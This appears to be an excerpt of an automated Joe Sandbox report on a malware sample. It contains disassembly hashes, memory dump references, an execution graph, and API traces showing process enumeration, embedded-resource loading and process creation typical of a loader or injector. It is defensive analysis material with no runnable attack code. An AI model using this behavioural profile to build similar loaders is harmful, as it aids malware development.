                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3990497365-0
                                                                                        • Opcode ID: 2e9e37f8d1e81b85bb5100cb850d499f8fb9e5ee5f19480b32315613965c3f51
                                                                                        • Instruction ID: fafafe1da7e4b337dc376cc2d285a00e054974824d0c3725fd033aa7a848131a
                                                                                        • Opcode Fuzzy Hash: 2e9e37f8d1e81b85bb5100cb850d499f8fb9e5ee5f19480b32315613965c3f51
                                                                                        • Instruction Fuzzy Hash: 59415E74A402589FDB22EB68DC89BDAB7FDAB08301F4440E5A548E7341DB70AF84CF55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f3b093ab615414098555e635550d71d4c3293ab06616ee3066752053bcf49da1
                                                                                        • Instruction ID: eeb904e4a6791b17692331308958b45ad94dacb2d1ae236f62176580b2994bf3
                                                                                        • Opcode Fuzzy Hash: f3b093ab615414098555e635550d71d4c3293ab06616ee3066752053bcf49da1
                                                                                        • Instruction Fuzzy Hash: C0A128667116000BD719AA7DAD843BDB3E2DBC5325F98827EE11DCB3C2EB68C9458750
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027D95DA), ref: 027D9572
                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027D95DA), ref: 027D9578
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: DateFormatLocaleThread
                                                                                        • String ID: yyyy
                                                                                        • API String ID: 3303714858-3145165042
                                                                                        • Opcode ID: df39e05453dddfdb088f138b2fad87a78d078675b9a85604adbc7d0ab86915fa
                                                                                        • Instruction ID: 1a767954d08a3eb2f53a31144c9e53425e1c10eb6a2c54dec63f5039474ed42d
                                                                                        • Opcode Fuzzy Hash: df39e05453dddfdb088f138b2fad87a78d078675b9a85604adbc7d0ab86915fa
                                                                                        • Instruction Fuzzy Hash: 78218175A00268DFDB11DFA8C995AAEB7B9EF09710F5100B5E946E7280D730DE40CF65
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027E828E), ref: 027E8270
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                        • String ID: FlushInstructionCache$Kernel32
                                                                                        • API String ID: 3811539418-184458249
                                                                                        • Opcode ID: f8d44f5fa550c809a2c829b0784f0d2d20260cd265cbbc301be15e3a4c87e296
                                                                                        • Instruction ID: 289ad154bccdfd716e846a573d6ea02b87e7afa4d662805d8ffb44e3292efd05
                                                                                        • Opcode Fuzzy Hash: f8d44f5fa550c809a2c829b0784f0d2d20260cd265cbbc301be15e3a4c87e296
                                                                                        • Instruction Fuzzy Hash: 7A01A979640708BFEB12EFA8DD1AF5A77FEEB4CB10F518420B601D6250D630AD148A36
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 027EAE10
                                                                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 027EAE40
                                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 027EAE5F
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 027EAE6B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Read$Write
                                                                                        • String ID:
                                                                                        • API String ID: 3448952669-0
                                                                                        • Opcode ID: e720fd1f35371ed8eed611904540eb1dceb651114ec14aff2087e2dc2d652641
                                                                                        • Instruction ID: f03c3d0a7acb7d50050832f2678eeaefc92fb1196315a73bc13d09e4be3607a4
                                                                                        • Opcode Fuzzy Hash: e720fd1f35371ed8eed611904540eb1dceb651114ec14aff2087e2dc2d652641
                                                                                        • Instruction Fuzzy Hash: FE21E17064021A9BCF10EF29DC85BAE77AAEF88720F008111ED5597380D734ED118AA0

                                                                                        Execution Graph

                                                                                        Execution Coverage: 9.7%
                                                                                        Dynamic/Decrypted Code Coverage: 50.1%
                                                                                        Signature Coverage: 17.2%
                                                                                        Total number of Nodes: 343
                                                                                        Total number of Limit Nodes: 41
                                                                                        execution_graph 45384 210149e0 45385 21014a26 GetCurrentProcess 45384->45385 45387 21014a71 45385->45387 45388 21014a78 GetCurrentThread 45385->45388 45387->45388 45389 21014ab5 GetCurrentProcess 45388->45389 45390 21014aae 45388->45390 45391 21014aeb 45389->45391 45390->45389 45392 21014b13 GetCurrentThreadId 45391->45392 45393 21014b44 45392->45393 45320 1cf6d030 45321 1cf6d048 45320->45321 45322 1cf6d0a2 45321->45322 45325 21170585 45321->45325 45331 21170588 45321->45331 45326 211705b5 45325->45326 45327 211705e7 45326->45327 45337 21170be4 45326->45337 45343 21170b08 45326->45343 45348 21170b18 45326->45348 45332 211705b5 45331->45332 45333 211705e7 45332->45333 45334 21170be4 2 API calls 45332->45334 45335 21170b18 2 API calls 45332->45335 45336 21170b08 2 API calls 45332->45336 45333->45333 45334->45333 45335->45333 45336->45333 45338 21170ba2 45337->45338 45339 21170bf2 45337->45339 45353 21170bd0 45338->45353 45356 21170bc0 45338->45356 45340 21170bb8 45340->45327 45344 21170b2c 45343->45344 45346 21170bd0 2 API calls 45344->45346 45347 21170bc0 2 API calls 45344->45347 45345 21170bb8 45345->45327 45346->45345 45347->45345 45350 21170b2c 45348->45350 45349 21170bb8 45349->45327 45351 21170bd0 2 API calls 45350->45351 45352 21170bc0 2 API calls 45350->45352 45351->45349 45352->45349 45354 21170be1 45353->45354 45360 21171d9c 45353->45360 45354->45340 45357 21170bd0 45356->45357 45358 21170be1 45357->45358 45359 21171d9c 2 API calls 45357->45359 45358->45340 45359->45358 45364 21171db0 45360->45364 45368 21171dc0 45360->45368 45361 21171daa 45361->45354 45365 21171e02 45364->45365 45367 21171e09 45364->45367 45366 21171e5a CallWindowProcW 45365->45366 45365->45367 45366->45367 45367->45361 45369 21171e02 45368->45369 45371 21171e09 45368->45371 45370 21171e5a CallWindowProcW 45369->45370 45369->45371 45370->45371 45371->45361 45394 2019d830 45396 2019d85b 45394->45396 
45395 2019d94a 45396->45395 45398 2019d2e8 45396->45398 45399 2019e348 CreateProcessW 45398->45399 45401 2019e609 45399->45401 45402 21014c28 DuplicateHandle 45403 21014d05 45402->45403 45404 20199fb0 45405 20199fbc 45404->45405 45406 20199ff9 45405->45406 45409 21013cd8 45405->45409 45413 21013cc8 45405->45413 45410 21013ce7 45409->45410 45417 210138a4 45410->45417 45414 21013ce7 45413->45414 45415 210138a4 2 API calls 45414->45415 45416 21013d08 45415->45416 45416->45406 45418 210138af 45417->45418 45421 210149a4 45418->45421 45420 210152fe 45422 210149af 45421->45422 45423 21015ff7 45422->45423 45424 21015f9c 45422->45424 45428 21017812 45422->45428 45433 21017828 45422->45433 45423->45420 45424->45423 45438 21174ad1 45424->45438 45429 21017849 45428->45429 45430 2101786d 45429->45430 45442 210179c7 45429->45442 45446 210179d8 45429->45446 45430->45424 45434 21017849 45433->45434 45435 2101786d 45434->45435 45436 210179c7 GetModuleHandleW 45434->45436 45437 210179d8 GetModuleHandleW 45434->45437 45435->45424 45436->45435 45437->45435 45440 21174b01 45438->45440 45439 21174ee0 WaitMessage 45439->45440 45440->45439 45441 21174b8c 45440->45441 45443 210179d2 45442->45443 45444 21017a1e 45443->45444 45450 21015c44 45443->45450 45444->45430 45447 210179e5 45446->45447 45448 21015c44 GetModuleHandleW 45447->45448 45449 21017a1e 45447->45449 45448->45449 45449->45430 45451 21015c4f 45450->45451 45452 21017a90 45451->45452 45454 21015c78 45451->45454 45455 21015c83 45454->45455 45460 21015c88 45455->45460 45457 21017aff 45464 2101d2c8 45457->45464 45458 21017b39 45458->45452 45463 21015c93 45460->45463 45461 21019080 45461->45457 45462 21017828 GetModuleHandleW 45462->45461 45463->45461 45463->45462 45466 2101d2f9 45464->45466 45467 2101d345 45464->45467 45465 2101d305 45465->45458 45466->45465 45470 2101d531 45466->45470 45473 2101d540 45466->45473 45467->45458 45476 2101d581 45470->45476 45471 2101d54a 45471->45467 45474 2101d54a 45473->45474 45475 2101d581 

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                        • API String ID: 1430744539-2962942730
                                                                                        • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                        • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                        • API String ID: 0-2735749406
                                                                                        • Opcode ID: e22abf4764bbbfc47d61a76d5f7a1e4c39c30659510167bce6eb00eee58f7624
                                                                                        • Instruction ID: 4f1e20b768e1ecb02ce65a3b6a59cee6120c7a4ae02e46e073dd8340fdca770a
                                                                                        • Opcode Fuzzy Hash: e22abf4764bbbfc47d61a76d5f7a1e4c39c30659510167bce6eb00eee58f7624
                                                                                        • Instruction Fuzzy Hash: CC823A30A01209DFCB05CFA8E984BAEBBF2BF48314F158559E4459B2A6DB35ED91CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$(o^q$,bq$,bq$Hbq
                                                                                        • API String ID: 0-56095411
                                                                                        • Opcode ID: f25ad835d29d4466fd7568511560101568051b328763f6eb8bb068a09f0b995c
                                                                                        • Instruction ID: ee15529c46aeca00c4952b3103999551e01033d5e4ab35f7b07dda6f15380af1
                                                                                        • Opcode Fuzzy Hash: f25ad835d29d4466fd7568511560101568051b328763f6eb8bb068a09f0b995c
                                                                                        • Instruction Fuzzy Hash: E1828D74A012199FCB04CFA9D894A9EBBF6BF88300F248569E905EB361DF34DD85CB51

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: dda595a7f8cf34edbea367627197f2245003dd31ddb3d3fce7f00b834efabfc2
                                                                                        • Instruction ID: 21a9ea63ff19c75b125f23da7c4e9e4bdd28338e4df525cdf02145ed64e52320
                                                                                        • Opcode Fuzzy Hash: dda595a7f8cf34edbea367627197f2245003dd31ddb3d3fce7f00b834efabfc2
                                                                                        • Instruction Fuzzy Hash: EB02D574E01218CFDB54DFA9D884B9DBBB2BF88304F10D1A9E808AB355DB759A85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113302494.0000000021170000.00000040.00000800.00020000.00000000.sdmp, Offset: 21170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21170000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c458f057b224e86c3b26dab4fb6ae71f9d9d4da3c7e606e0b4b91fb24c7730a
                                                                                        • Instruction ID: ca8b3f60f121ece83787748020c6e088abb4d9187e04efed4c9fa3893df01803
                                                                                        • Opcode Fuzzy Hash: 6c458f057b224e86c3b26dab4fb6ae71f9d9d4da3c7e606e0b4b91fb24c7730a
                                                                                        • Instruction Fuzzy Hash: BCD14B30E00219CFEB05CFA9C889B9DBBF1BF45314F158558E409AB7A5DB74EA46CB81
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000000,2019D94A), ref: 2019E5F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111939596.0000000020190000.00000040.00000800.00020000.00000000.sdmp, Offset: 20190000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20190000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: e27799ba7035788ad38726b2b831ad1770a37be69e77062749a90702173102cd
                                                                                        • Instruction ID: cf95c9c30dc27b354be0eb044c59687f053d5abbaac6cb5270adcd99da5c6085
                                                                                        • Opcode Fuzzy Hash: e27799ba7035788ad38726b2b831ad1770a37be69e77062749a90702173102cd
                                                                                        • Instruction Fuzzy Hash: C0C1AF74D00258DFDB50CFA9C980BDDBBF2BF49304F2491A9E518A7260EB74AA85CF45
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: dc3ec80f55dddaf7d9c6817d3df566ae503156c37e5d972520214fd4c7173d84
                                                                                        • Instruction ID: 817046637dbb5988f12fe2191e9cd6f12933e7bd8389bffc4d089cdfd14a0f44
                                                                                        • Opcode Fuzzy Hash: dc3ec80f55dddaf7d9c6817d3df566ae503156c37e5d972520214fd4c7173d84
                                                                                        • Instruction Fuzzy Hash: 5991AC71E002198BDB18DFB9C95469EBAF3EF88314F208669D405AB395EB349F05CF91
                                                                                        APIs
                                                                                        • WaitForInputIdle.USER32(?,?), ref: 2019E864
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111939596.0000000020190000.00000040.00000800.00020000.00000000.sdmp, Offset: 20190000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20190000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: IdleInputWait
                                                                                        • String ID:
                                                                                        • API String ID: 2200289081-0
                                                                                        • Opcode ID: decade0bc771cfc75198a70f11478f667a098184a583d75221d607bb3772716e
                                                                                        • Instruction ID: b57a221cea3cd7af3e81b9e50dbe9ac6cb4041b27d23c88b23016d021e9341fa
                                                                                        • Opcode Fuzzy Hash: decade0bc771cfc75198a70f11478f667a098184a583d75221d607bb3772716e
                                                                                        • Instruction Fuzzy Hash: 113199B4D002589FDB14CFEACA84A9EFBF1BB4A300F20902AE408BB354D774A945CF54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 20e2e2e68a394ae18302b869f72b077e9a323ba80b968a590d9924c2a7d022e1
                                                                                        • Instruction ID: 531e6071431676c381140ba2decd2e6d025563f4945a8e5ffc25a961bdd2d051
                                                                                        • Opcode Fuzzy Hash: 20e2e2e68a394ae18302b869f72b077e9a323ba80b968a590d9924c2a7d022e1
                                                                                        • Instruction Fuzzy Hash: 5482BE74E052298FDB64DFA9D984BDDBBB2AB49300F1491E9E40DA7251EB349EC1CF40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2771d1cbb5700b06cecba8dcb9ca8c987f4b7ba96d6ff1cc184acc38062b7c18
                                                                                        • Instruction ID: a6c981334f9045f6c97c99a43b3deb86c82ef7e17815198f4b2af252d3ab0ca2
                                                                                        • Opcode Fuzzy Hash: 2771d1cbb5700b06cecba8dcb9ca8c987f4b7ba96d6ff1cc184acc38062b7c18
                                                                                        • Instruction Fuzzy Hash: BB02AC74E01228CFEB64CFA5C994BDDBBB2BB98300F1080A9E509A7394DB755E85CF51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111939596.0000000020190000.00000040.00000800.00020000.00000000.sdmp, Offset: 20190000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20190000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 03c1cf3a920074e03988159ace8b0939abdaae21ae599aa8bd7bc29d5717f85e
                                                                                        • Instruction ID: 7323a108d1c97a66fb2760e9e5f479a87e7120683ac0f6ad80fe8a9acc84263f
                                                                                        • Opcode Fuzzy Hash: 03c1cf3a920074e03988159ace8b0939abdaae21ae599aa8bd7bc29d5717f85e
                                                                                        • Instruction Fuzzy Hash: A5F17C74E00228CFDB64DFA5C994BEDBBB2BB88300F1081AAD909A7354DB755E85DF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 146608c47e32e3b5ee9c5af4b0e1c721f682c9246c0cde01f58911d3bfeb526c
                                                                                        • Instruction ID: 24acaf59e96dce1963dce8ba35613815b7e7465112fd2792db068d251f8aaf84
                                                                                        • Opcode Fuzzy Hash: 146608c47e32e3b5ee9c5af4b0e1c721f682c9246c0cde01f58911d3bfeb526c
                                                                                        • Instruction Fuzzy Hash: F5F18E74E01228CFDB64DFA5C994B9DBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e42ec5addb9d889803c34167b949fb61a7309555c0c09d1e03b55ec3f100f2c8
                                                                                        • Instruction ID: 4b70a479534f17e07e13f89eb7513f60beec583a4070c7161eddfc20368b2930
                                                                                        • Opcode Fuzzy Hash: e42ec5addb9d889803c34167b949fb61a7309555c0c09d1e03b55ec3f100f2c8
                                                                                        • Instruction Fuzzy Hash: 5AB1A1B4E012298FEB64CF6AD984B9DFBF2BF89300F14C1A9D448A7254DB345A85CF51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f855c09201359145b8ef098280a4fca00ab81d0cef27d56190ac96b78782497e
                                                                                        • Instruction ID: 94f2a7473260a0bebf1c56c57d45ba9145ba164819798211c9c6d4d45cb0db4a
                                                                                        • Opcode Fuzzy Hash: f855c09201359145b8ef098280a4fca00ab81d0cef27d56190ac96b78782497e
                                                                                        • Instruction Fuzzy Hash: 48919075E012288FDB65CFA6D990BDDBBB2AF89300F1480EAD40DA7250EB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 563d2d84a18df9836e2885ac5b3a009df1294f7d17a3703fc750c0bbd693415b
                                                                                        • Instruction ID: f9b79f8de88b195195da5a82fe2f4ccc6c2d3a5114280e7a355220174827e26c
                                                                                        • Opcode Fuzzy Hash: 563d2d84a18df9836e2885ac5b3a009df1294f7d17a3703fc750c0bbd693415b
                                                                                        • Instruction Fuzzy Hash: E571A4B5E016288FEB68CF6AD844B9DFAF2AF89300F14C1E9D44DA7254DB744A85CF11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aec3b2f2f78c088dc542eff464c87fda9e979214445414aff832e250e9a3e608
                                                                                        • Instruction ID: 3c94fd7154805635713f2424e72594a5a0f3e27eca024a34c2d98e9be957807b
                                                                                        • Opcode Fuzzy Hash: aec3b2f2f78c088dc542eff464c87fda9e979214445414aff832e250e9a3e608
                                                                                        • Instruction Fuzzy Hash: 0641E274E012188FEB64CFBAD8507DEFBF2AF89304F1090AAD508A7251DB345A86CF55

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
